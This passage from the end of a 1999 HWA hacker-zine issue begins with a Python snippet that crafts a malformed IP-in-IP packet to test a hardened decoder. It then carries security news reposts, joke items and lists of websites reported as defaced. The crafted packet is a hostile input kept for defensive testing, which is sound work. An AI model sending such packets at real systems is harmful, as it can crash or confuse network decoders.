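    if total_len < hlen:
        raise ValueError("bad ip packet - total length %d < header %d" % (total_len, hlen))
    proto = buf[off + 9]
    layers = [(proto, hlen)]
    if proto == IPPROTO_IPIP:
        layers += parse_ip(buf, off + hlen, depth + 1)    # advance by a validated hlen
    return layers


if __name__ == "__main__":
    attack = ip_header(0, IPPROTO_IPIP, 6574) + b"BLADI TZ TO TOPO"   # mirrors the posted packet
    print("naive decoder advances to offset", naive_next_offset(attack, 0))
    try:
        parse_ip(attack)
    except ValueError as e:
        print("hardened decoder:", e)
    inner = ip_header(5, IPPROTO_TCP, 24) + b"data"
    outer = ip_header(5, IPPROTO_IPIP, 20 + len(inner)) + inner
    print("well-formed ip-in-ip:", parse_ip(outer))
```

The check has to run before the header length is used for anything, not just before the recursive call: a bogus IHL also misplaces the TCP, UDP and ICMP decoders, so one rejection at the top of the function covers every protocol branch.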
@HWA
124.0 [ISN] A mouse that roars?
~~~~~~~~~~~~~~~~~~~~~~~~~
Forwarded From: William Knowles
http://www.washingtonpost.com/wp-srv/national/dotmil/arkin.htm
A Mouse That Roars?
By William M. Arkin
Special to washingtonpost.com
Monday, June 7, 1999
Last week, Newsweek reported that President Clinton approved a covert
operation in May to find an electronic silver bullet to do what the White
House at the time believed the air war couldn't. According to the report,
the CIA would conduct a cyberwar against Milosevic, specifically going
after his financial assets in banks throughout Europe.
Is the keyboard mightier than the sword?
Before Allied Force, the intelligence agencies held a cyberwar exercise to
answer this very question.
At center stage was the Information Operations Technology Center (IOTC),
activated last year and made up of the best cyberwarriors of the U.S.
government. Housed at National Security Agency headquarters at Fort Meade,
Md., IOTC brings together highly secret capabilities: NSA's P42
information warfare cell, the CIA's Critical Defense Technologies
Division, the Pentagon's "special technology operations."
Military sources familiar with the March demonstration say there is no
question that the keyboard covert operators wowed the Joint Staff with
their computer attack capabilities. But they are adamant in insisting that
cyberbombs are more laboratory technologies than usable weapons. In fact,
the sources point out, the only cyberwar raging is inside the U.S.
government where Washington lawyers and policymakers, military leaders,
and official hackers battle over the value and legality of network attack.
Where's The Bits?
---------------------------------------------------------------------------
The day bombs started falling on Yugoslavia, the Air Force Association
convened a high-level symposium in San Antonio, Tex., to address the
status of information warfare. Washingtonpost.com has obtained a
transcript of the two-day proceeding.
Gen. John Jumper, commander of U.S. Air Forces in Europe, joined the
closed-door session via satellite from his headquarters in Germany. "I
have not had much sleep over the last 48 hours, and I am probably not as
sharp or prepared as I would like to be," he apologized.
Tired or not, the senior air force officer in Europe wasted no time
blasting the bias of information warriors to fight battles solely at the
"strategic level." He was referring to the very sort of effort Newsweek
would speculate about two months later.
"When we hear talk of information warfare," Jumper said, "the mind
conjures up notions of taking some country's piece of sacred
infrastructure in a way that is hardly relevant to the commander at the
operational and tactical level."
"I would submit that we are not there with information warfare," he
concluded.
Networking Network Attack
----------------------------------------------------------------------------
Brig. Gen. John B. Baker, commander of the Air Intelligence Agency and
head of the Pentagon's Joint Command and Control Warfare Center, followed
Jumper.
"In my hat as the air force component commander for NSA," he warned, "I
spend a lot of time working ... on how to exploit what is going on out
there in computer networks." But when it comes to going beyond collecting
computer transmissions as raw intelligence to actually manipulating and
exploiting the "zeroes and ones" for military value, Baker said, "we have
a ways to go."
---------------------------------------------------------------------------
Despite all the new information warfare organizations that have been
established of late, he lamented that cyberwarriors did not yet have the
stature of other warriors: "Effects-based warfare," that is, methods
geared to achieve an outcome and not cause traditional damage lacks the
"visually pleasing destruction from an armed bomb."
Baker stressed that part of the problem in any kind of computer network
attack is the concerns on the part of policy-makers in Washington with
regard to legality and "traceability."
Jumper described his experience: "I picture myself around that same
targeting table where you have the fighter pilot, the bomber pilot, the
special operations people and the information warriors. As you go down the
target list, each one takes a turn raising his or her hand saying, 'I can
take that target.' When you get to the info warrior, the info warrior
says, 'I can take the target, but first I have to go back to Washington
and get a finding.'"
Seeking permission invariably results in artificial restrictions and
hesitations in attacking targets, Jumper stressed. From a field
perspective, he said, the process of seeking the "special" operation cedes
too much decision-making to inside the Beltway.
Finding The Way
The unusually candid discussions of the institutional and military
stumbling blocks to an information warfare future contrasts with the
Hollywood vision of cyberwar so common in the mainstream media these days.
Still, Maj. Gen. Bruce A. "Orville" Wright told the symposium that "Within
the area of computer network exploitation, there is tremendous investment,
which, with a little bit of fine tuning, can be turned into a computer
network attack capability."
The IOTC, Wright said, "is a great organization that has a bright future."
He should know. As Deputy Director for Information Operations for the
Joint Chiefs of Staff, he is the military head of the interagency center
and the top cyber-warrior in the U.S. military.
But the key word is future.
With the shooting war against Yugoslavia over, it should be crystal clear
to anyone that exotic American cyberbombs have not aided the effort in any
way.
-o-
Subscribe: mail majordomo@repsec.com with "subscribe isn".
Today's ISN Sponsor: OSAll [www.aviary-mag.com]
@HWA
125.0 [ISN] Product Review: NOVaSTOR DataSAFE
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
From: "L. Sassaman"
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1
Product Review: NOVaSTOR DataSAFE
L. Sassaman
6/1/1999
The NOVaSTOR web site (http://data-encryption.com/index.html) makes this
bold claim regarding their DataSAFE product:
"Password Protect, Compress and Encrypt your Files and Email Protect your
data from prying eyes! The DataSAFE family of encryption software stores,
transmits and receives electronic files securely. Protect your sensitive
files and data from prying eyes, whether on your PC or over the Internet
and World Wide Web. DataSAFE encrypts your data with BLOWFISH or RSA
secure algorithms which have never been broken, and can encrypt and
protect every type of file on every kind of media."
The benefits of using this software package are clear, according to the
company. "DataSAFE is the only encryption software on the market that lets
you send secure documents to people who do not have the program."
Apparently, for a mere $39.50, one can have a quick, easy way of sending
secure files to anyone with a computer. When using this product, the sender
uses the program to generate a .exe file, encrypted with Blowfish, that he
then sends as an attachment through email. The recipient does not need to
have any additional software on his computer, as the encrypted message
runs by itself (popping up a cute safe, which spits out the plain-text
when the correct combination is entered.)
Now, obviously, this lacks all the benefits of public key cryptography.
(The key, or "combination to the safe" must be delivered to the recipient
in some manner deemed secure. We are now back to the days of relying on
couriers with hand-cuffed brief-cases for security. The web page steps
over this issue, merely saying "you send [the key] separately".) The
product offers no identity verification for the author or originator of
the file being transferred. In addition, the .exe generated is a potential
carrier of virii, and only works on Microsoft systems. (Though a Java
version is promised.)
The product white paper
(http://data-encryption.com/datasheets/ds_white.html) makes this absurd
statement regarding public key cryptography (PKC):
"Public key encryption was discarded because it is too difficult to
establish key exchange with third party organizations running a variety of
computer hardware, mail systems and security programs. For example, a
typical law office needs to be able to send secure documents to a wide
range of client organizations, each having their own unique combination of
computers, mail and security systems."
PGP, and its free clone released under the GPL, GnuPG, are perfect
examples of secure PKC that are easily implemented across a variety of
computer hardware, mail systems and security systems. There is an
established network of public key servers that is widely used by nearly
every combination of software and hardware across the entire Internet.
(http://pgp.ai.mit.edu/ is one such server.) DataSAFE, however, is
not available except on systems running the correct versions of Microsoft
operating systems.
The closing statement on the product white paper offers this explanation
for the product's design:
"It should be recognized that BLOWFISH is just one of many excellent
encryption algorithms. In real life situations the security provided
depends much more on the user's ability to make use of the software than
the mathematical underpinnings of the encryption engine. The NOVaSTOR
DataSAFE strives to be so simple to use that people are willing and able
to secure their files."
Granted, the best encryption software in the world is useless if people
won't use it. But, in my opinion it is far more dangerous to lure people
into a false sense of security. Products like DataSAFE could possibly
encourage someone to reveal sensitive material on electronic
correspondence that he would otherwise have been reluctant to communicate.
It is my recommendation that DataSAFE not be used by anyone requiring
anything more than casual security. The freely available GnuPG
(http://www.gnupg.org), and the inexpensive PGP (www.pgp.com) offer the
best system for secure email communication available, and should be used
by anyone who is concerned about privacy. Products like DataSAFE should be
set aside, along with the secret decoder ring from the breakfast cereal
box.
L. Sassaman
System Administrator | "What's true in our minds is true,
Technology Consultant | whether some people know it or not."
icq.. 10735603 |
pgp.. finger://ns.quickie.net/rabbi | --Robin Williams
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v0.9.7 (GNU/Linux)
Comment: OpenPGP Encrypted Email Preferred.
iD8DBQE3U/MyPYrxsgmsCmoRAthbAJsGLzLS8wCqjnwSLgkZY6lEJN6kUQCeJhwC
H5e+Iquwq/c1GUq6ndZzdPY=
=BN59
-----END PGP SIGNATURE-----
-o-
Subscribe: mail majordomo@repsec.com with "subscribe isn".
Today's ISN Sponsor: OSAll [www.aviary-mag.com]
@HWA
126.0 [ISN] Technology a threat to right of privacy Silicon Valley
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Forwarded From: Putrefied Cow
Technology a threat to right of privacy Silicon Valley
(Irish Times; 06/04/99)
Last week, the US Congress requested that its intelligence services
provide a detailed report about a global electronic eavesdropping system
known as Echelon. They refused. Now congress is moving to make its request
law.
Echelon is just one of the emerging uses of technology that is eroding
a basic human right, privacy. The system indiscriminately monitors
satellite and Internet communications traffic using keyword searches in
the case of e-mail, and scanning for certain telephone numbers in the case
of mobile phones.
The report was requested by Congress's House Committee on Intelligence
and specifically asked that National Security Agency and the Central
Intelligence Agency provide an account as to what legal standard they use
to monitor US citizens.
Another system, currently in the pipeline is EU's Enfopol, a
specification that will provide European law enforcement officials with an
electronic back door into the computer systems of Internet Service
Providers and mobile telecommunications companies.
Furthermore, later this year, the EU plans to introduce new encryption
(a technology that scrambles data so that it cannot be read by
eavesdroppers) legislation, which may affect people's right to exchange
messages that cannot be read by law enforcement.
Indeed, Internet and electronic privacy will be one of the biggest
issues affecting citizens in the next century. Unfortunately law makers in
Ireland, Europe and the US are staggeringly naive about the effects
these new laws, systems and so-called specifications will have on their
future.
The problem is one of ignorance. Law makers often don't understand
technology and don't look far enough into the future to see how Internet
and wireless communications will touch virtually every aspect of our lives
in the not too distant future. But why the concern? Police and
intelligence services are only trying to catch terrorists, criminals and
child pornographers. True, if they are to catch these people they need to
be able to track their movements, ensure that they are not shifting large
amounts of money into offshore bank accounts and nip their next deadly or
grossly illegal plans in the bud.
Surely, you couldn't object to that? Unless, of course, you would
object to passing a law that would enable police to go through your
credit-card receipts without a court order, tap your telephone at will and
make a list of every place you visited, and every person you talked to
without proper judicial control. Because that is what these systems allow.
Increasingly people are buying goods and services on the Internet. This
not only includes a novel from say, Amazon.com, but banking, share trading
and even insurance services. Back-door access to mobile telephone records
will not only provide access to conversations but pinpoint the location of
the mobile phone and therefore its user. Furthermore, governments
mistakenly believe that their judicial system will protect their citizens
from abuses of these new methods of data collection and surveillance.
However perhaps it's not just the local police force that should concern
us, but the police force and intelligence agencies of foreign governments.
Take the Echelon system, for example, it was established under the
UKUSA agreement by the US's National Security Agency, and Britain's
Government Communications Headquarters to monitor the communications of the
eastern bloc countries. While Echelon was designed as a system to monitor
spies, according to a recent report prepared for the European Parliament's
Scientific and Technology Options Assessment Panel there is evidence that
member-countries also use the Echelon system for industrial espionage. The
report states that British intelligence routinely collects information
such as "company plans, telexes, faxes, and transcribed phone calls," and
that the **NSA** provides weekly reports to the US department of commerce.
The report recommends that Europe adopt strong encryption technology
rather than restrict it and points out that it is the larger nations that
have invested in spying activities, leaving smaller nations vulnerable.
While few could object to these systems to apprehend criminals there
needs to be awareness of exactly what powers they give governments and law
enforcement. There also needs to be a way to ensure that they are being
used correctly. It has taken centuries to gain the right to privacy,
surely we should not throw it away so readily.
-o-
Subscribe: mail majordomo@repsec.com with "subscribe isn".
Today's ISN Sponsor: OSAll [www.aviary-mag.com]
@HWA
-=--=--=--=-=--=-=--=-=--=-=--=-=--=-=--=-=--=-=--=-=--=-=--=-=--=-=--=-=--=-=--=-=--=-=--=-
T H E   R U M O U R   M I L L
-=--=--=--=-=--=-=--=-=--=-=--=-=--=-=--=-=--=-=--=-=--=-=--=-=--=-=--=-=--=-=--=-=--=-=--=-
Rumours:
~~~~~~~
Cartoon Hackers??
~~~~~~~~~~~~~~~~~~
New IRC Network
Contributed by siko
Monday - June 21, 1999. 06:27PM UTC
From www.innerpulse.com
Do you ever experience harsh channel takeovers? Get nuked all day long?
Get ridiculous spam directed your way? Hindered by immature skript kids?
Want more of the same? Come to Slacknet! You can point your IRC client
towards irc.slacknet.org, or irc.callcenterstech.net (server run by siko). Join
#slacknet when you connect for all questions, concerns, and propositions.
Slacknet IRC
http://www.slacknet.org
June 22nd 1999
From HNN http://www.hackernews.com/
contributed by delchi
WB Scraps 'Real Hackers' Cartoon
Rumor has it that Warner Brothers and Mattel have
scrapped an idea for a new Saturday morning cartoon
with a tie in toy line called "Real Hackers". The defunct
storyline was to portray a group of real life hackers in
cartoon form, reformed and fighting for good. Amongst
the hackers to be represented were 'phiber optik',
'bernie s', 'death veggie', 'emmanuel goldstein' and 'weld
pond' as cyber warriors as they fought criminals bent on
destroying the internet. It is unknown why Warner
Brothers and Mattel scrapped this idea or if it even
existed in the first place but in this hot pre Christmas
marketplace, one can only wonder how long it will be
before this ground breaking idea starts making money
for somebody.
Kasparov CheckMated?
~~~~~~~~~~~~~~~~~~~~
June 23rd 1999
From HNN http://www.hackernews.com/
contributed by Anonymous
Kasparov CheckMated?
A source close to the BBC has told us that they think
the World vs. Kasparov Chess match had been
compromised yesterday by cyber intruders. Evidently
the "World" playing against Kasparov had numerous
Kings on the board at once. HNN has received no
confirmation of this report. If anyone knows what
really went on we would like to hear it.
AD.S ADVERTI$ING. The HWA black market ADVERTISEMENT$.
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
*****************************************************************************
* *
* ATTRITION.ORG http://www.attrition.org *
* ATTRITION.ORG Advisory Archive, Hacked Page Mirror *
* ATTRITION.ORG DoS Database, Crypto Archive *
* ATTRITION.ORG Sarcasm, Rudeness, and More. *
* *
*****************************************************************************
www.2600.com www.freekevin.com www.kevinmitnick.com www.2600.com www.freekevi
n.com www.kevinmitnick.com www.2600.com www.freekevin.com www.kevinmitnick.co
m www.2600.com ########################################ww.2600.com www.freeke
vin.com www.kev# Support 2600.com and the Free Kevin #.com www.kevinmitnick.
com www.2600.co# defense fund site, visit it now! . # www.2600.com www.free
kevin.com www.k# FREE KEVIN! #in.com www.kevinmitnic
k.com www.2600.########################################om www.2600.com www.fre
ekevin.com www.kevinmitnick.com www.2600.com www.freekevin.com www.kevinmitnic
k.com www.2600.com www.freekevin.com www.kevinmitnick.com www.2600.com www.fre
www.2600.com
One of our sponsors, visit them now www.csoft.net
* * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * *
* * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * *
* WWW.BIZTECHTV.COM/PARSE WEDNESDAYS AT 4:30PM EST, HACK/PHREAK CALL-IN WEBTV *
* JOIN #PARSE FOR LIVE PARTICIPATION IN SHOW CHAT OR THE WEBCHAT, AND WEBBOARD*
* * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * *
* * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * *
* WWW.2600.COM OFF THE HOOK LIVE NETCAST'S TUES SIMULCAST ON WBAI IN NYC @8PM *
* * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * *
//////////////////////////////////////////////////////////////////////////////
// To place an ad in this section simply type it up and email it to //
// hwa@press.usmc.net, put AD! in the subject header please. - Ed //
//////////////////////////////////////////////////////////////////////////////
@HWA
HA.HA Humour and puzzles ...etc
~~~~~~~~~~~~~~~~~~~~~~~~~
Don't worry. worry a *lot*
Send in submissions for this section please! .............
www.innerpulse.com is back. Here's a couple of ditties from them:
Local Hacker Lays Smack Down on Inferior Hacker
Contributed by siko
Wednesday - June 23, 1999. 04:48PM UTC
The chilling tale of hacker on hacker violence unfolded in the small IRC
channel #hackphreak on Undernet this afternoon as a hacker calling himself
'clocker' explained the events.
"It all started when this kid who can't possibly have more of an IQ than 80
started telling me about how he was a hacker. I had to smack him in the face.
He said Linux was an ISP like AOL."
The drama entailed many reactions. Some were in fear for their own safety
from this "Hacker Enforcer". One hacker was later accused by clocker of
"running windows".
The hacker, clocker, was not available for comment. His mother made him
clean his room.
Hackers Continue to Retaliate
Contributed by siko
Tuesday - June 22, 1999. 03:42AM UTC
Two new groups have stood up in the battle against the extreme injustice
of the FBI raiding several computer hackers that admitted to committing high
crimes. Early this morning, minix.closet.jpl.nasa.gov was cracked by a hacker
exploiting an unknown hole in the qpopper pop3 daemon. Version 2.43b4 of
the mail server was thought to be secure.
m0nk3yz 4 L1f3 left the following message on the cracked server:
We are not jsut kids here doing this attakc thign. Their is no reasen for
thinking we are young and not dangarous. We will keap hitting every
.gov on the NET until the FBI comes crying on they're nees. Fear us.
The second group, Niggaz With Attitude AND Computahz, completed a
large portscan of www.fbi.gov.
"I think they left their firewall port open, so we plan on netbussing the router
so we can gain access to the lan and audit the internal security removing the
firewall and changing the index.html.". explained uberklown. "By simply
bypassing their network sockets we can go over to commands, drop down
to nuke.. and hope from there on out."
Innerpulse caught up with Albert Renford, director of Network Security at
the FBI.
INNERPULSE So when did you first realize you were going to get
attacked by skilled crackers from across the globe?
AL RENFORD Well we first detected a lot of connection attempts to our
telnet port. I learned about password security at a trade show I attended in
LA and had recently changed my root password from 'sex' to something
more difficult. After the rash of failed logins, we began to notice a fluctuation
in the amount of connections to port 139 we were getting. Something about
oob or something. Weird.
INN So what would you rate this threat on a scale of 1-10?
AR Obviously it's a 10. We are dealing with professional system crackers,
cracking into servers with loads of sensitive data on them. You can't find
exploits anywhere!
IPP Have you ever visited rootshell.com?
AR ?
Attrition
http://www.attrition.org/
Hacker News Network
http://www.hackernews.com
Song sung to the tune of "I'm the very model of a modern major general"
from: http://www.harley.com/harley-quotes/unix-sysadmin.html
by Harley Hahn
Unix Sysadmin:
I am the very model of a modern Unix Sysadmin,
I've information relevant to programs in slash usr bin,
I know the tricks of emacs and the vi bugs historical,
From a to ZZ upper case, in order categorical;
I'm very well acquainted too with matters of the interface,
I understand commands of pine, and how they hurt the human race.
About the pico editor I'm teeming with a lot o' bosh –
With many cheerful facts of how it's dumber than a Macintosh.
Everyone:
With many cheerful facts of how it's dumber than a Macintosh.
Unix Sysadmin:
I'm very good at showing users how to pick the best of tools,
I know I should avoid the nerds who hang out in the vestibules;
In short, in matters relevant to programs in slash usr bin,
I am the very model of a modern Unix Sysadmin.
Everyone:
In short, in matters relevant to programs in slash usr bin,
He is the very model of a modern Unix Sysadmin.
-=-
@HWA
SITE.1
@HWA
H.W Hacked websites
~~~~~~~~~~~~~~~~
Note: The hacked site reports stay, especially with some cool hits by
groups like *H.A.R.P, go get em boyz racism is a mugs game! - Ed
* Hackers Against Racist Propaganda (See issue #7)
Haven't heard from Catharsys in a while; for those following their saga, visit
http://frey.rapidnet.com/~ptah/ for 'the story so far'...
From the HNN rumours section http://www.hackernews.com/
See the archives section on HNN or attrition.org for copies of many of these
sites in their defaced form.
http://www.attrition.org/
contributed by Anonymous
Cracked
Yet another busy weekend. The following sites have
been reported to HNN as being cracked.
http://www.chatuk.co.uk
http://maif.gov
http://www.freakstudios.com
http://cenwo.nwo.usace.army.mil
http://www.qplanet.com
http://www.qplanet.net
http://www.gccnj.edu
http://www.panthersfootball.com
http://www.atlantabravesbaseball.com
http://rsd.gsfc.nasa.gov
http://www.bbutx.com
http://fusion.library.mssm.edu
http://www.depaul.edu
http://www.jinxcorp.com
http://www.fweebsd.org
http://www.landersoil.com
http://www.naturalbornassholes.com
http://www.rug.ac.be
http://sun.vdp.fr
June 8th
contributed by Anonymous
Cracked
http://www.zms.or.jp
http://nt.oneworld.org
http://icg.clarkson.edu
June 9th
contributed by Anonymous
Cracked
The following sites have been reported as being cracked.
http://kln.gov.my
http://www.landfield.com
http://www.420.net
http://www.me.fau.edu
http://www.zms.or.jp
http://nt.oneworld.org
http://icg.clarkson.edu
June 10th
contributed by Anonymous
Cracked
The following sites have been reported as cracked.
http://www.joshcomm.com
http://www.usd.edu
http://www.ioc.state.il.us
http://www.alloweb.com
http://www.coollinux.com
June 11th
contributed by Anonymous
Cracked
Things seem to have slowed down a little recently. HNN
has only received reports that three web sites have been cracked.
http://programmingjunkies.com/
http://sol.marc.usda.gov
http://index.ecu.edu
June 14th
contributed by Anonymous
Cracked
The following sites were reported as cracked over the
weekend.
http://www.garufa.com
http://www.ancort.ru
http://www.cdiunesco.org.ar
http://www.cenidet.edu.mx
http://www.galvash.com.mx
http://www.naboodesigns.cx
http://www.foxintl.com
http://www.bbay.com
http://mail.edomex.gob.mx
http://www.matrix.msu.edu
http://index.ecu.edu
June 15th
contributed by Anonymous
Cracked
X-PLOIT TEAM has returned with reported cracks of
Mexican Government web sites as they continue to fight
against corrupt government, and for freedom of speech.
http://www.edomorelos.gob.mx
June 16th
contributed by Anonymous
Cracked
Things have seemed to be a little slow lately. Maybe
because it is summertime. With the new IIS hole things
will probably pick up. These are the sites that have
been reported as cracked.
http://www.skinheads.com
http://www.softlink.cz
http://rs-nt-1.une.edu.au
http://virtual.lead.org
http://www.shoot-n-iron.com
http://www.zophar.com
June 17th
contributed by Anonymous
Cracked
The following sites have been reported as cracked.
http://data3.gmu.edu
http://www.highplaces.org
http://ellzeymarine.com
http://multilinkcom.com
http://orion.web-hosting.com
http://www.exo2060.com
http://www.justmark.com
June 18th
contributed by Anonymous
Cracked
http://www.flavoredthunder.com
http://nc-101.hypermart.net
http://www.hansatreuhand.de
http://www.aj.com
http://www.wabba.com
June 21st
Cracked
It looks like it has been a busy weekend for some. The
following sites have been reported as cracked. (Note:
There are two .mil domains in this list.)
http://www.metro.seoul.kr
http://pindar.ilt.columbia.edu
http://www.fpac.fsu.edu
http://www.gis.dk
http://cob-distance02.colorado.edu
http://shadowflax.cs.byu.edu
http://www.castnetcom.com
http://www.ies.ncsu.edu
http://www.ruckstuhlgaragen.ch
http://www.bpfa.com
http://www.catalogcafe.com
http://www.des.uwm.edu
http://insite.net
http://www.wabba.com
http://www.bisnet.scsu.edu
http://rs-nt-1.une.edu.au
http://www.cityhackers.com
http://www.hsd401.org
http://fjsrc.urban.org
http://www.communityofcaring.org
http://lhi5.ifsm.umbc.edu
http://uhec.udmercy.edu
http://www.earthforce.org
http://www.e-lawyers.net
http://www.dancinghands.com
http://www.coolkids.com
http://www.aggerholm.com
http://www.canada.org.mx
http://www.mightymedia.com
http://www.wib.lehigh.edu
http://www.nswcl.navy.mil
http://www.ntsc.navy.mil
http://armstrong.scu.edu
http://uhec.udmercy.edu
http://www.ameralert.com
http://www.autosportmag.com
http://www.futuristicsound.com
http://www.lyndalong.com
http://www.netpay321.net
http://www.ohioagent.com
http://www.showcase-newhomes.com
http://www.eurobasket99.com
http://plan.arch.usyd.edu.au
http://bluesroom.co.za
http://seekerz.co.za
http://www.good-design.com
http://www.xpandcorp.com
June 22nd
contributed by Anonymous
Cracked
The following sites have been reported as cracked.
http://lhi5.umbc.edu
http://www.reg.niu.edu
http://mnyouth.org
http://www.dynamic-21.com
http://www.ergointerfaces.com
http://www.salcotoys.com
http://www.teachertalk.com
http://www.usd.edu
June 23rd
Cracked
The following sites have been reported to us as
compromised.
http://hpws3.ihep.ac.cn
http://www.atljf.org
http://www.121trade.com
http://www.bizzcity.com
http://www.internetgate.com
http://www.nflgameday.com
http://www.orgplanning.com
http://www.thanks-cgi.com
http://observer.gsfc.nasa.gov
http://www.ipub.com
June 24th
contributed by Anonymous
Cracked
The following sites have been reported as cracked.
http://www.5aday.gov
http://www.kukje.co.kr
http://www.drysound.com
http://www.internet-club.com
http://www.justmark.com
http://www.thanks-cgi.com
June 25th
contributed by Anonymous
Cracked
The following sites have been reported as cracked:
http://www.cpr-training.com
http://www.magnaflow.com
http://www.library.anl.gov
http://www.industrialbikes.com
http://www.monmouth.army.mil
http://www.sterzing.com
http://www.unicef.org.ar
http://cis.georgefox.edu
http://arcvirtualcampus.org
http://www.musclecars.org
http://www.habaco.com
http://www.iphase.com
http://www.arkon.net
http://www.art-by-kaki.com
http://www.dcclan.com
http://www.heckerdesign.com
http://www.nlac.gov.tw
http://www.pixeled.com
http://www.twilightsoftware.com
http://www.cpac.org
http://www.forpc.com.au
http://www.orgplanning.com
http://www.nethelpnow.com
http://www.appliedcls.com
http://www.craigcph.com
http://www.damascusbakery.com
-------------------------------------------------------------------------
A.0 APPENDICES
_________________________________________________________________________
A.1 PHACVW, sekurity, security, cyberwar links
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
The links are no longer maintained in this file, there is now a
links section on the http://welcome.to/HWA.hax0r.news/ url so check
there for current links etc.
The hack FAQ (The #hack/alt.2600 faq)
http://www-personal.engin.umich.edu/~jgotts/underground/hack-faq.html
hack-faq
Hacker's Jargon File (The quote file)
http://www.lysator.liu.se/hackdict/split2/main_index.html
Original jargon file
New Hacker's Jargon File.
http://www.tuxedo.org/~esr/jargon/
New jargon file
HWA.hax0r.news Mirror Sites:
~~~~~~~~~~~~~~~~~~~~~~~~~~~
http://www.csoft.net/~hwa/
http://www.digitalgeeks.com/hwa.
http://members.tripod.com/~hwa_2k
http://welcome.to/HWA.hax0r.news/
http://www.attrition.org/~modify/texts/zines/HWA/
http://packetstorm.genocide2600.com/hwahaxornews/
http://archives.projectgamma.com/zines/hwa/.
http://www.403-security.org/Htmls/hwa.hax0r.news.htm
International links:(TBC)
~~~~~~~~~~~~~~~~~~~~~~~~~
Foreign correspondents and others, please send in news site links that
have security news from foreign countries for inclusion in this list.
Thanks... - Ed
Belgium.......: http://bewoner.dma.be/cum/
Go there
Brasil........: http://www.psynet.net/ka0z
Go there
http://www.elementais.cjb.net
Go there
Colombia......: http://www.cascabel.8m.com
Go there
http://www.intrusos.cjb.net
Go there
Indonesia.....: http://www.k-elektronik.org/index2.html
Go there
http://members.xoom.com/neblonica/
Go there
http://hackerlink.or.id/
Go there
Netherlands...: http://security.pine.nl/
Go there
Russia........: http://www.tsu.ru/~eugene/
Go there
Singapore.....: http://www.icepoint.com
Go there
Turkey........: http://www.trscene.org - Turkish Scene is Turkey's first and best security related e-zine.
Go there
Got a link for this section? Email it to hwa@press.usmc.net and I'll
review it and post it here if it merits it.
@HWA
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-
--EoF-HWA-EoF--EoF-HWA-EoF--EoF-HWA-EoF--EoF-HWA-EoF--EoF-HWA-EoF--
© 1998, 1999 (c) Cruciphux/HWA.hax0r.news (R) { w00t }
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-
--EoF-HWA-EoF--EoF-HWA-EoF--EoF-HWA-EoF--EoF-HWA-EoF--EoF-HWA-EoF--
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-
[ 28 63 29 20 31 39 39 39 20 63 72 75 63 69 70 68 75 78 20 68 77 61 ]
[45:6E:64]-[28:63:29:31:39:39:38:20:68:77:61:20:73:74:65:76:65]
+++ ATH0